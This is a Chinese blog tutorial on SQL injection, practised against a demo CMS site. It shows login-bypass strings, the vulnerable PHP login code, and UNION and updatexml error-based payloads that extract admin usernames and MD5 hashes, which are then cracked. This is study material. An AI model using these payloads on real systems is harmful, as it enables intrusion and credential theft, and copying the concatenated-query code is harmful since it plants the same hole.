SQL注入案例及原理

最新推荐文章于 2024-03-28 17:37:32 发布
最新推荐文章于 2024-03-28 17:37:32 发布
阅读量418 收藏 1
点赞数
文章标签: sql 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/QYbkx974/article/details/134241545
版权

SQL注入案例及原理

前言

本次将简单的学习SQL注入案例及原理

一、SQL注入是什么?

SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。

二、通过万能用户名来登录网页管理系统

万能用户名

这两个就是万能用户名,下面将进行实际操作

  1. aaa’ or 1=1 #

  2. aaa’ or ‘1’='1

首先进入演示网站中的后台管理
在这里插入图片描述 可以看到有一个登录界面
在这里插入图片描述这里随便输入一个用户名和密码登录/用户名:admin 密码:password
在这里插入图片描述可以看到登录失败
在这里插入图片描述

使用bp抓包查看,可以发现登录包为POST请求,而且可以看到我们刚刚输入的用户名和密码,以及请求回显为200
在这里插入图片描述这次我们使用万能用户名登录/用户名:aaa' or 1=1 # 密码:1

在这里插入图片描述发现可以登录,用户名为我们刚刚输入的万能用户名
在这里插入图片描述使用bp抓包查看,POST请求包中输入的用户名所包含的特殊字符变成了URL编码,%27为',空格为了+,等于号为%3D,井号为%23。回显中发现密码变为了MD5形式。
在这里插入图片描述在这里插入图片描述

由此可以推断这个网页源码存在问题

解析

以下为源码文件

<?php
session_start ();
header('Content-Type: text/html; charset=utf-8');
include_once ("../include/config.inc.php");
if (isset ( $_POST ["username"] )) {
	$username = $_POST ["username"];
} else {
	$username = "";
}
if (isset ( $_POST ["password"] )) {
	$password = $_POST ["password"];
} else {
	$password = "";
}
//记住用户名
setcookie (username, $username,time()+3600*24*365);
if (empty($username)||empty($password)){
	exit("<script>alert('用户名或密码不能为空!');window.history.go(-1)</script>");
}
$user_row = $db->getOneRow("select userid from cms_users where username = '".$username."' and password='".md5 ( $password ) ."'");
echo "select userid from cms_users where username = '".$username."' and password='".md5 ( $password ) ."'";
if (!empty($user_row )) {
	setcookie (userid, $user_row ['userid'] ); 
	header("Location: index.php");
}else{
	//echo "select userid from cms_users where username = '".$username."' and password='".md5 ( $password ) ."'";
	exit("<script>alert('用户名或密码不正确!');window.history.go(-1)</script>");
}
?>


$user_row = $db->getOneRow("select userid from cms_users where username = '".$username."' and password='".md5 ( $password ) ."'");
//可以看出包含了SQL语句,登录验证方式为通过select查询cms库中users表的信息,判断是否有该用户。

我们将万能用户名代入

$user_row = $db->getOneRow("select userid from cms_users where username = 'aaa' or 1=1 #".$username."' and password='".md5 ( $password ) ."'");
这样可以分为两段,分别是
1.$user_row = $db->getOneRow("select userid from cms_users where username = 'aaa' or 1=1 #
2.".$username."' and password='".md5 ( $password ) ."'");
第二段变为注释内容,第一段可以理解为使用了`or`运算符,一个为真都为真,其中`1=1`为真,所有恒为真,后面的`#`为注释内容

三.联合查询

进入页面随便点击一篇文章,可以看到有?id=33,将33更改为34
在这里插入图片描述
发现将?id=33改为?id=34后网页内容发生了改变在这里插入图片描述现在在?id=34后面加入',查看有什么变化
在这里插入图片描述
这里使用的工具是HackBar,发现网页报错在这里插入图片描述解析一下报错信息

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’’ at line 1

其中主要看的内容为near ‘’’,其中一个'是我们输入的,按照SQL语句来看应该是select FUZZ from FUZZ where id=34,因为多输了一个'所有报错,另外这个id所获取的是数字类型,不是字符串类型
id=34后面添加and 1=1,发现网页信息又会重新显示出来
在这里插入图片描述通过order by来判断列数
在这里插入图片描述显示没有100列,使用二分查找法继续判断,最后发现只有15行
在这里插入图片描述使用联合查询来判断显示位数union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
在这里插入图片描述发现没有什么变化,这是因为需要把id=34改为假,这里我们改为id=-34
在这里插入图片描述发现311有回显,我们将3改为version(),11改为database(),查看结果
在这里插入图片描述这样子原先3的位置变为了数据库的版本,·11的位置变成了数据库的名称

四.获取后台管理员账密

有四种方法,其中布尔盲注和延时注入的成本极高,望谨慎执行

1.联合查询

首先查询cms库中所有的表名
在这里插入图片描述其中count(*)是显示表的数量,hex(group_concat(table_name))是显示表名,这里可以使用bp中的Decoder转换,information_schema.tables where table_schema=database()为所查询的库
在这里插入图片描述查询cms_users表的信息,发现有两个用户,这里显示的是第一个用户
在这里插入图片描述使用limit 1,1,就可以查询出第二个用户
在这里插入图片描述

2.报错注入

首先查询库名

updatexml(1,concat(0x5e,(select database()),0x5e),1)

在这里插入图片描述查询cms库中表的个数

id=34 and updatexml(1,concat(0x5e,(select count(*) from information_schema.tables where table_schema=database()),0x5e),1)

在这里插入图片描述逐一获取表名

updatexml(1,concat(0x5e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x5e),1)

在这里插入图片描述第八个表为cms_users表
在这里插入图片描述查询cms_users表中有几个数据。0x636d735f7573657273cms_users的16进制转换

updatexml(1,concat(0x5e,(select count(*) from information_schema.columns where table_schema=database() and table_name=0x636d735f7573657273),0x5e),1)

在这里插入图片描述查询各个数据

updatexml(1,concat(0x5e,(select column_name from information_schema.columns where table_schema=database() and table_name=0x636d735f7573657273 limit 0,1),0x5e),1)

在这里插入图片描述在这里插入图片描述
在这里插入图片描述分别为useridusernamepassword,因为userid没有什么用处,主要精力放在usernamepassword

updatexml(1,concat(0x5e,(select username from cms_users limit 0,1),0x5e),1)//查询username表中第一个用户名

在这里插入图片描述
这是第二个用户名在这里插入图片描述查询admin的密码为[e10adc3949ba59abbe56e057f20f883e](https://www.somd5.com/),123456

updatexml(1,concat(0x5e,(select substr(password,1,16) from cms_users limit 0,1),0x5e),1)
updatexml(1,concat(0x5e,(select substr(password,17,32) from cms_users limit 0,1),0x5e),1)
//因为是MD5加密的32位密码,所有分两次查询

在这里插入图片描述在这里插入图片描述
查询ajest的密码和上述相同,密码为cbff36039c3d0212b3e34c23dcde1456,123.com
在这里插入图片描述受不了了,布尔盲注和延时注入稍后再说

一十一丶青禾
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入实战
11-20
安全大神冰河亲自制作SQL注入入门级案例,非常适合初学者研究实践SQL注入,更好的提升自身对SQL 漏洞的注入能力和对数据库安全的认识。
sql各种注入案例
m0_69435261的博客
09-01 4626
GTID_SUBSET( set1 , set2 ) - 若在 set1 中的 GTID,也在 set2 中,返回 true,否则返回 false ( set1 是 set2 的子集)GTID_SUBTRACT( set1 , set2 ) - 返回在 set1 中,不在 set2 中的 GTID 集合 ( set1 与 set2 的差集)GTID_SUBSET() 和 GTID_SUBTRACT() 函数,我们知道他的输入值是 GTIDset ,当输入有误时,就会报错。GTID_SUBSET函数。
毕业设计:基于深度学习的SQL注入检测系统 信息安全 python
最新发布
Hai_Lang_IT的博客
03-28 959
毕业设计:基于深度学习的SQL注入检测系统通过深入分析SQL注入攻击的特征和模式,系统可以学习和识别恶意SQL语句,并准确判断其是否存在注入风险。该系统将结合深度学习和计算机安全技术,利用大规模的SQL注入数据集进行模型训练和优化,以实现高效准确的注入检测。本课题为计算机专业、软件工程专业、人工智能专业、大数据专业的毕业生提供了一个创新的方向,结合了深度学习和计算机安全技术,为毕业生提供了一个有意义的研究课题。对于计算机专业、软件工程专业、人工智能专业、大数据专业的毕业生而言,提供了一个具有挑战性的课题。
SQL注入16】SQL漏洞利用之读写文件
Fighting_hawk的博客
02-22 4209
1. 对文件进行读写既收到文件系统对用户权限的制约、也收到数据库设置的制约。 2. 掌握利用SQL漏洞进行文件读写的方法。 3. 后续需要进一步了解如何获取网站根目录路径的方法。
sql注入实例
weixin_45901902的博客
11-11 4744
前阵子发现公司的网站有SQL注入漏洞,向项目经理提了以后,得到的答复异常的冷淡:“早就知道,这种asp的网站肯定有漏洞,要是Asp.net的网站就没问题”,先暂不评价此说法对错,如此冷淡的反应只能说明了对SQL注入的无知,今天就通过这个实例来告诉大家SQL注入究竟有多大的危害。 初步注入--绕过验证,直接登录 公司网站登陆框如下: 可以看到除了账号密码之外,还有一个公司名的输入框,根据输入框的形式不难推出SQL的写法如下: 1 SELECT*FromTableWHEREName...
SQL注入的简单案例
勇敢的兵
09-01 3642
文章目录什么是SQL注入使用数据库客户端工具查询用户表访问ERP系统(对密码输入框进行SQL注入SQL注入原理解决方案重新注册一个管理员账号使用sys账号登录ERP系统(输入正确的密码)使用sys账号登录ERP系统(对密码输入框进行SQL注入)UserDAO类的完整代码 什么是SQL注入 SQL注入是现在普通使用的一种攻击手段,就是通过把非法的SQL命令插入到Web表单中或页面请求查询字符串中...
Sql注入示例
我想我是海 冬天的大海 心情随风轻摆
05-19 1209
Sql注入是我们经常听说的,具体极大的风险性,下面给一个比较直观的示例:
SQL注入案例演示与防范措施大全
热门推荐
乱世刀疤
02-26 1万+
SQL注入攻击案例与应对措施。
防范SQL注入研究的课程设计
毕业作品网站
05-31 138
最后,安装 PHP,输入命令"sudo apt-get install php7.0 libapache2-mod-php" , “sudo apt-get install php7.2-mysql”,并进行相应的配置操作。采用 PHP 进行网页编程,main.php 为目标网站主页面,选择 low,improved 两个选项,进入不同安全等级的网页,其中 low 安全等级最低,对输入的用户 ID 不进行任何过滤操作,improved则对输入数据进行特殊字符过滤和是否为数字的检测。1、 攻击测试环境 5。
SQL注入基础原理案例(详细总结)
剁椒鱼头没剁椒的博客
10-20 6203
本篇总结了学习SQL注入的笔记,暂时没总结WAF绕过方面的内容,后期会对WAF绕过进行总结。目前先总结一些基础的东西,可能有些参数不全,具体的参数或者函数可以百度搜索一下。发生在 Web 程序中数据库层的安全漏洞,是网站存在最多也是最简单的漏洞。主要原因是程序对用户输入数据的合法性没有判断和处理,导致攻击者可以在 Web 应用程序中事先定义好的 SQL 语句中添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步获取到数据信息。
SQL注入实验详细过程及讲解
2302_78587828的博客
08-14 2175
SQL 注入攻击是通过将恶意的SQL查询或添加语句插入到应用的输入参数中,再在后台SQL服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。
SQL代码注入详解和防范技巧
08-04
详细讲述了sql注入原理和各种注入的手法 并具体讲述了如何防范sql注入的方法
第17天:WEB漏洞-SQL注入之二次,加解密,DNS等注入1
08-03
WEB 漏洞-二次,加解密,DNS 等注入#加解密,二次,DNSlog 注入注入原理,演示案例,实际应用(中转注入)DNSlog:解决了盲注不能回显数据,效率低
SQL SERVER 2000开发与管理应用实例
12-13
13.5.1 防止SQL注入式攻击 417 13.5.2 限制应用程序访问 418 13.5.3 不安全的扩展存储过程 419 第 14 章 系统表应用实例 423 14.1 系统对象概述 423 14.1.1 每个数据库中都存在的系统表 424 ...
程序员的SQL金典.rar
03-29
 10.1.1 SQL注入漏洞原理  10.1.2 过滤敏感字符  10.1.3 使用参数化SQL  10.2 SQL调优  10.2.1 SQL调优的基本原则  10.2.2 索引  10.2.3 全表扫描和索引查找  10.2.4 优化手法  10.3 事务  10.3.1 事务...
程序员的SQL金典4-8
05-20
 10.1.1 SQL注入漏洞原理  10.1.2 过滤敏感字符  10.1.3 使用参数化SQL  10.2 SQL调优  10.2.1 SQL调优的基本原则  10.2.2 索引  10.2.3 全表扫描和索引查找  10.2.4 优化手法  10.3 事务  10.3.1 事务...
关于sql注入这一篇就够了(适合入门)
qq_53105813的博客
01-07 4766
sql注入详解
SQL 注入
weixin_64531675的博客
06-19 132
(查看显示位,union 作用是将多个select语句的结果整合到一个结果中返回,union 语句使得输入多个select语句成为可能,union 语句后的select语句是我们想要注入的代码)这说明该表单存在 sql 盲注漏洞,可以输入猜测的语句函数来观察应用返回的结果,通过这个方法可以一步一步猜解出想知道的内容。在文本框中输入' or '1'='1 并提交。结果显示了 id 为 1 的用户信息,这说明前面测试的 1'是 web 应用已经预料到的错误,这里很可能会有 sql 盲注漏洞,来继续猜测。
关于SQL注入及防御
Wang的专栏
06-12 2293
一般攻击者会假设网站有sql注入的漏洞,比如这个查询语句: 攻击者假设这个10是文章的id, 攻击者就会猜测可能是上面的sql语句 页面上输入的参数是10,这时候,就可以拼凑测试,比如在url上拼接 1 ) 判断是否可以注入, 一般而言,如果可以的话页面正常,不报错,但是也有其他情况,如下 这两个都没什么反应,不报错,页面正常,说明后面的and没有起作用 攻击者会猜测可能是字符串存在引号的问题, 继续尝试 这样如果页面出错,那么继续修改 这时候页面不报错 这种情况(恒等正常,恒不等报错)就说明,一
sql注入攻击与防御第二版 pdf
07-04
SQL注入攻击是一种利用输入的SQL代码进行非法操作的攻击方式。攻击者可以通过在输入框中注入恶意的SQL代码,从而绕过应用程序的认证和授权机制,对数据库进行各种操作,例如删除、修改、插入数据,甚至获取数据库中的敏感信息。 《SQL注入攻击与防御第二版》是一本关于SQL注入攻击的防御和应对策略的书籍。该书介绍了SQL注入攻击的原理、常见的攻击方式、实际案例以及相应的防御措施。 在防御SQL注入攻击时,我们可以采取以下一些措施: 1. 使用参数化查询或预编译语句:这种方式可以防止攻击者通过输入恶意的SQL代码来注入攻击。参数化查询使用占位符来代替输入的变量,预编译语句将SQL查询语句和变量分开进行处理,从而有效防止注入攻击。 2. 对输入进行过滤和验证:在接收用户输入时,可以对输入进行过滤和验证。例如,可以使用正则表达式或编码转换函数来过滤用户输入中的特殊字符,从而防止注入攻击。 3. 最小权限原则:数据库用户应该被赋予最小权限,在应用程序连接数据库时,使用具有最小权限的数据库用户,限制了攻击者对数据库的操作。 4. 定期更新和升级软件:应该及时更新数据库和应用程序的补丁,以修复已知的漏洞,提高系统的安全性。 5. 日志监控和异常检测:及时监控数据库操作日志,发现异常操作并进行相应的处理。可以通过设置数据库的审计功能、使用入侵检测系统等方式进行日志监控和异常检测。 通过了解并遵循上述防御措施,可以增强系统的安全性,有效地防范SQL注入攻击。《SQL注入攻击与防御第二版》这本书将为读者提供更深入的理解和应对策略。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值